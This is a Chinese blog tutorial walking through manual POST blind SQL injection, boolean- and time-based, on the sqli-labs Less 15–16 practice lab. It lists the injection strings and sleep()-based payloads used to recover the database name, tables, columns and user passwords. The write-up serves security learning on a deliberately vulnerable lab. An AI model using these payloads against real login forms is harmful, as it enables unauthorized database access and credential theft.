(手工)【sqli-labs15-16】POST注入:布尔/时间盲注

最新推荐文章于 2024-05-26 10:49:06 发布
最新推荐文章于 2024-05-26 10:49:06 发布
阅读量993 收藏 11
点赞数 3
分类专栏: # 【全】sqlil-abs靶场 文章标签: web安全 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_53079406/article/details/125666908
版权

目录

推荐:

一、(手工)SQL注入基本步骤:

二、Less15(POST-Blind -Boolian/Time Based - Single Quotes)

2.1、简介:(布尔/时间盲注-单引号)

2.2、第一步:注入点测试

布尔型注入

2.3、第二步:猜数据库名长度

 2.4、第三步:猜数据库名(ASCII码)

2.5、第四步:猜表名

2.6、第五步:猜字段名

 2.7、第六步:猜数据

时间盲注:

2.3、第二步:猜数据库名长度

2.4、基本操作

三、Less16(POST-Blind -Boolian/Time Based - Double Quotes)

2.1、简介:(布尔/时间盲注-双引号-反括号)

推荐:

【SQL注入-有回显】DNS请求注入:原理、平台、使用过程、配置icon-default.png?t=M666https://blog.csdn.net/qq_53079406/article/details/125285625?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522165719814516782246440800%2522%252C%2522scm%2522%253A%252220140713.130102334.pc%255Fblog.%2522%257D&request_id=165719814516782246440800&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2~blog~first_rank_ecpm_v1~rank_v31_ecpm-1-125285625-null-null.185^v2^control&utm_term=DNS&spm=1018.2226.3001.4450【SQL注入-无回显】时间盲注:原理、函数、利用过程icon-default.png?t=M666https://blog.csdn.net/qq_53079406/article/details/125096394?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522165719829016781683968225%2522%252C%2522scm%2522%253A%252220140713.130102334.pc%255Fblog.%2522%257D&request_id=165719829016781683968225&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2~blog~first_rank_ecpm_v1~rank_v31_ecpm-2-125096394-null-null.185^v2^control&utm_term=%E7%9B%B2%E6%B3%A8&spm=1018.2226.3001.4450【SQL注入-无回显】布尔盲注:原理、函数、利用过程icon-default.png?t=M666https://blog.csdn.net/qq_53079406/article/details/125275974?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522165719829016781683968225%2522%252C%2522scm%2522%253A%252220140713.130102334.pc%255Fblog.%2522%257D&request_id=165719829016781683968225&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2~blog~first_rank_ecpm_v1~rank_v31_ecpm-3-125275974-null-null.185^v2^control&utm_term=%E7%9B%B2%E6%B3%A8&spm=1018.2226.3001.4450

 

一、(手工)SQL注入基本步骤:

第一步:注入点测试

第二步:猜数据库名长度

第三步:猜数据库名(ASCII)

第四步:猜表名长

第五步:猜表名

第六步:猜字段名长

第七步:猜字段名

第八步:猜数据长

第九步:猜数据

二、Less15(POST-Blind -Boolian/Time Based - Single Quotes)

2.1、简介:(布尔/时间盲注-单引号)

请求方法:POST

方法:布尔/时间布尔盲注

2.2、第一步:注入点测试

1 or 1=1#
1' or 1=1#
1" or 1=1#
1') or 1=1#
1") or 1=1#

 测试1' or 1=1#时

 测试其他的时候

 

存在SQL盲注,且有2种状态,对错

且为bool型单引号闭合盲注(也可以用时间盲注)

布尔型注入

2.3、第二步:猜数据库名长度

admin' and (length(database()))>7#

为对

 

admin' and (length(database()))>8#

为错

 

所以 当前数据库名称长度为:8

 2.4、第三步:猜数据库名(ASCII码)

admin' and ascii(substr(database(),1,1))>100#

为对

 

admin' and ascii(substr(database(),1,1))<150#

为对

 在100-150之间

 二分法,一直从中间分下去,直到确定一个值对应的ascii码

通过这个方法判断出整个数据库名

2.5、第四步:猜表名

admin' and (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1)))>100#

为对

 

admin' and (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1)))<150#

为对

 值在100-150之间

 采用二分法以此类推得到唯一的值

通过这个方法判断出整个表名

2.6、第五步:猜字段名

admin' and (ascii(substr((select column_name from information_schema.columns where table_name='users' limit 1,1),1,1)))>40#

为对

 

admin' and (ascii(substr((select column_name from information_schema.columns where table_name='users' limit 1,1),1,1)))<80#

为对

 值在40-80之间

 采用二分法以此类推得到唯一的值

通过这个方法判断出整个字段名

 2.7、第六步:猜数据

 采用二分法以此类推得到唯一的值

通过这个方法判断出整个字段名

时间盲注:

2.3、第二步:猜数据库名长度

admin' and if(length(database())>7, sleep(5),0)#

判断正确,转了5s

admin' and if(length(database())>8, sleep(5),0)#

判断错误,未转

 

 所以当前数据库名称长度为:8

2.4、基本操作

暴库

admin' and if(ascii(substr(database(),1,1))>100, 0, sleep(5))#

暴表

admin' and if(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))>100, 0, sleep(5))#

暴字段

admin' and if(ascii(substr((select column_name from information_schema.columns where table_name='users' limit 0,1),1,1))>100, 0, sleep(5))#

暴数据

admin' and if(ascii(substr((select password from security.users limit 0,1),1,1))>100, 0, sleep(5))#

三、Less16(POST-Blind -Boolian/Time Based - Double Quotes)

2.1、简介:(布尔/时间盲注-双引号-反括号)

请求方法:POST

方法:布尔/时间盲注

 方法和Less15一样

黑色地带(崛起)
关注
  • 3
    点赞
  • 11
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
sql注入自动化脚本POST和GET型
m0_73728268的博客
03-09 332
post和get型sql注入自动化脚本
使用 Burpsuite 进行POST 方式的SQL注入
枫梓林のBlog
04-25 8031
使用 Burpsuite 进行POST 方式的SQL注入 文章目录使用 Burpsuite 进行POST 方式的SQL注入0x01 Burpsuite介绍1.打开浏览器设置代理2.打开 burp suite0x02 POST 方式注入1.打开 Less-11页面0x03 POST 方式的盲注1.POST 方式的布尔盲注1.1 Less-152.POST 方式的时间盲注0x04 HTTP 头的注入方式1.HTTP 头注入原理2. HTTP User-Agent 注入Less-183.HTTP Referer
高级Web安全测试:POST方式盲注技术详解与实战案例
最新发布
weixin_43822401的博客
05-26 394
盲注技术要求攻击者在没有直接反馈的情况下,通过应用程序的行为变化来推断数据库的内部信息。这种技术通常用于那些对错误信息进行了严格处理的应用程序,使得普通的注入手段无法获取有用信息。
盲注时间布尔实战
weixin_46163639的博客
05-22 458
盲注(Blind SQL Injection) URL是GET,注册登录是POST 理论:构造错误的输入参数值,前端没有显示出报错信息,通过盲注来实现注入 盲注有两种类型:1.布尔型 Boolean 基于真假的判断,结果只会返回真假两种,通过之前的and方法来判断是否有注入点。 关键在于通过表达式结果与已知值进行对比,根据比对结果 判断正确与否。 布尔盲注实战: Burpsuite模块—-Intruder模块详解 具体应用请移步然后回来再看看就明白: https://www.cnblogs.com/yufu
sql注入_1-4_post盲注
weixin_44110913的博客
12-04 1411
sql注入_1-4_post盲注 一.post盲注概念 1.首先post盲注和get盲注一样,只是不会拼接到url中 2.post请求会向指定资源提交数据,请求服务器进行处理,如,表单提交,文件上传等,请求数据会包含在请求体中 3.使用post方法时,查询字符在post信息中单独存在,和http请求一起发送到服务器 二.实验 这里我们使用sqli less-15实验基于post时间布尔 先...
POST基于时间布尔盲注
qq_60876907的博客
07-19 260
命令:uname=admin' and (select if (length(datebase()>5,sleep(5),null))) -- &passwd=admin&submit=Submit。存在注入POST提交的参数 + and if (length(datebase())>5,sleep(5),null).如果执行的时间页面响应时间大于5 秒,肯定存在注入点,并且对应的SQL 语句执行。1,在存在注入POST提交的参数后加入 if 判断正确或者错误的语句。2,POST基于时间盲注
sqlilabs第五关布尔盲注burpsuite版)
qq_62044589的博客
04-04 1214
sqlilabs第五关单引号闭合布尔盲注burpsuite。
sqli-labs-master.zip
11-20
最新sqli-labs代码,自己也可以到github下载:https://github.com/Audi-1/sqli-labs
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
phpstudy+靶场sqli-labs-master下载
11-08
【标题】"phpstudy+靶场sqli-labs-master下载" 涉及的主要知识点是PHPStudy集成环境和SQL注入漏洞靶场Sqli-Labs。这两个工具是学习和测试Web安全,尤其是SQL注入攻击与防御的重要资源。 PHPStudy是一款集成的PHP...
windows环境下安装sqli-labs
11-04
Windows 环境下安装 sqli-labs 详细教程 Windows Server 2012 环境下安装 sqli-labs 需要具备一定的基础知识和环境准备。在这里,我们将详细介绍如何在 Windows Server 2012 环境下安装 sqli-labs。 环境准备 在...
jeakinscheung-sqli-labs-php7-master.zip
03-16
标题 "jeakinscheung-sqli-labs-php7-master.zip" 暗示这是一个关于SQL注入SQL Injection)练习平台的源代码库,专为PHP7优化。在描述中提到,用户在尝试创建数据库连接时遇到问题,可能是因为原始的SQL注入实验室...
sqli-labs第十五和十六关(post请求-布尔盲注
qq_42266432的博客
08-26 855
开启第十五关,先尝试注入注入多次后发现页面无报错也无回显,于是尝试盲注 使用万能密码’ or 1=1登陆成功,’ or 1=2登录失败,这里可以使用布尔盲注, 研究响应页面发现登录成功和登录失败时底下的提示是一个图片,而图片的命名不同,可以此区分成功和失败,开始写脚本,脚本的思路和之前使用布尔盲注的关卡类似,只需修改请求类型、数据和if条件即可,代码如下: import requests # 获取数据库名长度 def database_len(): for i in range(1,10):
sqli-labs(15-19关)
weixin_55843787的博客
04-16 3048
sqli-labs靶场过关 源码分析
SQL注入学习——Bool盲注详解 sqli-labs(Less 8)
未完成的歌~的博客
07-29 6243
Less-7导出文件GET字符型注 打开页面输入?id=1 试了很多发现报错信息都一样,查看下源代码: if($row) { echo '<font color= "#FFFF00">'; echo 'You are in.... Use outfile......'; echo "<br>"; echo "</font>"; ......
布尔盲注怎么用,一看你就明白了。布尔盲注原理+步骤+实战教程
热门推荐
wangyuxiang946的博客
03-16 2万+
写给每一个为了让自己变得更好,而坚持努力的你。
SQL盲注第一天-布尔注入
2201_75389336的博客
01-19 255
SQL盲注第一天-布尔注入
sqli-lab教程——Less-9 GET - Blind - Time based. - Single Quotes (基于时间的GET单引号盲注)
luosaierdadi的博客
07-08 545
不管怎么输入,回显总是you are ... 考虑时间盲注,payload ?id=1' and sleep(3) --+ 注意id=1,发现明显延迟,说明注入成功,接下来爆破就完了。这道题的payload构造和第五题的方法一是一样的,一些废话就不多说了,这里就列一下过程,完事儿。爆库payload?id=1' and if(length(database())=4 , sleep(3), 1) --+ 发现当?id=1' and if(length(database())=8 , sleep(3), 1
sqli-labs靶场之时间盲注
2302_78903258的博客
05-19 617
这里可以解释为当我们进行数据库名的长度判断时,如果条件成立,sleep函数延迟3秒后回显界面,如果条件不成立,就输出0 -----提示一下,如果大家网络有延迟的话,将sleep()函数里面的值设置为大一点,5啊10啊都ok的。这里的判断语句跟布尔盲注基本是一样的,所以大家不懂得话可以先学一下布尔盲注,这里获得的是库名的第一个字符,其他字符只需要更改substr()函数的值就ok了-------可以的到数据库名为security。获得数据---------这里同样也有两种用法。
SQL注入学习之路:sqli-labs靶场实战解析
"sqli-labs靶场练习笔记涵盖了从2关到24关的SQL注入学习内容,适合初学者参考,涉及单引号、双引号注入布尔盲注数据库名、表名、列名的探测,以及利用注入进行文件写入和信息获取等技能。" 在SQL注入的学习过程...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

黑色地带(崛起)

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值